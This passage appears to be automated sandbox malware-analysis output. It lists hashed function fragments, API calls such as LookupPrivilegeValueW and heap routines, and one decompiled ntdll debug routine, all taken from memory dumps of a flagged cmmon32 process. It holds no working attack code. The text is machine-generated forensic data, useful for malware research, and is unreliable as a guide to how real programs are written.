                                                            • Opcode ID: c83b5e28e8a00fd93af8028a2a09e4ce519e2b2d6651ff97d2aab342c39d1877
                                                            • Instruction ID: b0046ab8ca9888a44dbeaf6ac17599b1e9d921345e1241d745649ff34bd8aa72
                                                            • Opcode Fuzzy Hash: c83b5e28e8a00fd93af8028a2a09e4ce519e2b2d6651ff97d2aab342c39d1877
                                                            • Instruction Fuzzy Hash: 51E086756402092BFB2466B89C45F6633588B48728F684678FA1CDB6C2D674F6428154
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 027DCA7D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction ID: d6be2a5f4ba7fe8a63ec91be130b2d7daba94101f43e3f8b175fc843e3acb479
                                                            • Opcode Fuzzy Hash: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction Fuzzy Hash: 2CE01AB1200204ABCB14EF49DC48EA737ADAF88750F014058B90957241C630E910CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(027D6E26,?,027D75BD,027D75BD,?,027D6E26,00000000,?,?,?,?,00000000,00000000,00000002), ref: 027DCA3D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction ID: 66fe502c0ff972ccfa7115aeed8cd83469145ea39623fe864f54949eae9e8002
                                                            • Opcode Fuzzy Hash: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction Fuzzy Hash: D8E046B2310208ABCB24EF89DC44EAB37ADEF88760F018058FE095B241C630F910CAF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,027CE0F2,027CE0F2,?,00000000,?,?), ref: 027DCBE0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction ID: 50541007e21c8582af7128e80f474dd4d439f4d8be88e02f4bd990af87dabe6d
                                                            • Opcode Fuzzy Hash: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction Fuzzy Hash: E0E01AB1200304ABC724EF49CC44EE737ADAF88654F014058BA0957241C630E9108AB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 027DCA7D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction ID: 27bdd9e384b3e7880635163064289c384543d8cbf748f758444d9d731eb7736f
                                                            • Opcode Fuzzy Hash: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction Fuzzy Hash: 55E046B2300204AFCB24EF58DC48EEB3B69EF88350F018158F9099B281C230E910CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,027C8D8A,?), ref: 027CE5D1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 6741bafb0424fa7b4ab3383a257de2b7a2000609cec0738d4b89301aaf0b93da
                                                            • Instruction ID: 1f4024bbb3387e959e4e3035346738f491b3dd905cffa9ff6cc58434b4f666a9
                                                            • Opcode Fuzzy Hash: 6741bafb0424fa7b4ab3383a257de2b7a2000609cec0738d4b89301aaf0b93da
                                                            • Instruction Fuzzy Hash: 5CD05EB57843093BFA10A7F59C06F1A328D4B44761F544068FA0CE72C2E950F2008565
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
                                                            • Instruction ID: 17dba3ffacc9696046cebc841402da2e65c322d3a7d9d3dddc9c2f3816df4448
                                                            • Opcode Fuzzy Hash: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
                                                            • Instruction Fuzzy Hash: 55B02BB19010C4C9F700D76007087173A5077C0702F12C022D1020340A0338E094F1B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E0457FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                            				void* _t7;
                                                            				intOrPtr _t9;
                                                            				intOrPtr _t10;
                                                            				intOrPtr* _t12;
                                                            				intOrPtr* _t13;
                                                            				intOrPtr _t14;
                                                            				intOrPtr* _t15;
                                                            
                                                            				_t13 = __edx;
                                                            				_push(_a4);
                                                            				_t14 =  *[fs:0x18];
                                                            				_t15 = _t12;
                                                            				_t7 = E0452CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                            				_push(_t13);
                                                            				E04575720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                            				_t9 =  *_t15;
                                                            				if(_t9 == 0xffffffff) {
                                                            					_t10 = 0;
                                                            				} else {
                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                            				}
                                                            				_push(_t10);
                                                            				_push(_t15);
                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                            				return E04575720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                            			}











                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0457FDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0457FE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0457FE01
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
                                                            • Instruction ID: c45c053610e81c6333d7c7df413c397f3541aa6d824a059ad467a06f61bc3de5
                                                            • Opcode Fuzzy Hash: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
                                                            • Instruction Fuzzy Hash: C7F0FC322005017FEA211A55EC01F237B6AFB84770F240315F624555D1E9A2F820A6F4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%